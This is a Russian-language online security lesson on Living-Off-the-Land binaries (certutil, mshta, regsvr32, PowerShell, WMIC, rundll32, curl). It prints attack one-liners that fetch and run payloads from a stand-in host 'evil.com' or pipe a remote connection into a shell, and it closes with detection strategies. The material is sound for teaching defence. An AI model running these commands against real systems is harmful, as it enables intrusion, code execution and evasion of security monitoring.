Бинарные файлы Living-Off-the-Land (LOLBins)
Используйте доверенные бинарные файлы Windows (certutil, mshta, regsvr32), чтобы обходить обнаружение.
«Бинарные файлы Living-Off-the-Land (LOLBins)» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 2 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.
Что такое LOLBins?
Легитимные системные двоичные файлы (LOLBins) — это легитимные двоичные файлы и инструменты ОС, которые злоумышленники переиспользуют для выполнения вредоносных действий. Поскольку это доверенные подписанные системные инструменты, они часто обходят белые списки приложений и снижают вероятность обнаружения средствами AV/EDR.
Почему LOLBins эффективны
Преимущества для злоумышленников:
- Всегда присутствуют в целевых системах — не требуется размещать новые файлы
- Подписаны Microsoft или Apple — обходят обнаружение на основе сигнатур
- Пользуются доверием решений для создания белых списков приложений
- Создают похожие на легитимные деревья процессов
PowerShell как LOLBin
PowerShell — наиболее часто используемый LOLBin. Злоумышленники используют его для:
# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"certutil
certutil.exe — средство Windows для работы с сертификатами, которое может загружать файлы:
# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exemshta и wscript
Выполнение скриптов через доверенные узлы:
# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.jsregsvr32 Squiblydoo
regsvr32.exe может загружать и выполнять DLL из удалённых URL с помощью флагов /s /n /u /i, обходя AppLocker и запуская неподписанный код в доверенном процессе:
regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dllВыполнение с помощью WMIC и WMI
Windows Management Instrumentation позволяет удалённо и локально выполнять код:
# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"Rundll32
rundll32.exe загружает и выполняет точки входа DLL:
# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payloadLOLBins в Linux
Аналоги в Linux:
# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.ioLOLBAS и GTFOBins
Справочные базы:
- LOLBAS (lolbas-project.github.io) — двоичные файлы, скрипты и библиотеки Windows
- GTFOBins (gtfobins.github.io) — двоичные файлы Linux/macOS для эксплуатации, чтения и записи файлов, повышения привилегий через SUID
Обнаружение злоупотребления LOLBin
Стратегии обнаружения:
- Журналирование блоков скриптов PowerShell (EventID 4104) — записывает декодированные команды
- Sysmon EventID 1: создание процесса с цепочкой родительских процессов
- Оповещения о неожиданных связях между родительским и дочерним процессами: Word → PowerShell, Excel → cmd
- Сетевые соединения от certutil, mshta и powershell
- Базовые профили UEBA для выявления аномального использования двоичных файлов
Быстрая проверка: LOLBins
Какой двоичный файл Windows может загрузить удалённый файл с помощью флага -urlcache?
Итоги урока
LOLBins — это легитимные инструменты ОС, переиспользуемые в вредоносных целях: PowerShell, certutil, mshta, regsvr32, rundll32 и WMIC в Windows; curl, python и openssl в Linux. Они обходят обнаружение на основе сигнатур и белые списки приложений. Для обнаружения требуются журналирование создания процессов (Sysmon), журналирование блоков скриптов PowerShell и поведенческие базовые профили. LOLBAS и GTFOBins — важнейшие справочные базы.
Часто задаваемые вопросы
Урок «Бинарные файлы Living-Off-the-Land (LOLBins)» бесплатный?
Да — полный текст урока «Бинарные файлы Living-Off-the-Land (LOLBins)» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.
Чему я научусь в уроке «Бинарные файлы Living-Off-the-Land (LOLBins)»?
Используйте доверенные бинарные файлы Windows (certutil, mshta, regsvr32), чтобы обходить обнаружение. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Cyber Security Academy?
Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 2 из 4.
Сколько времени занимает урок «Бинарные файлы Living-Off-the-Land (LOLBins)»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Cyber Security Academy?
Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Фреймворки C2: Cobalt Strike и Sliver
- Бинарные файлы Living-Off-the-Land (LOLBins)
- Методы горизонтального перемещения
- Составление отчётов красной команды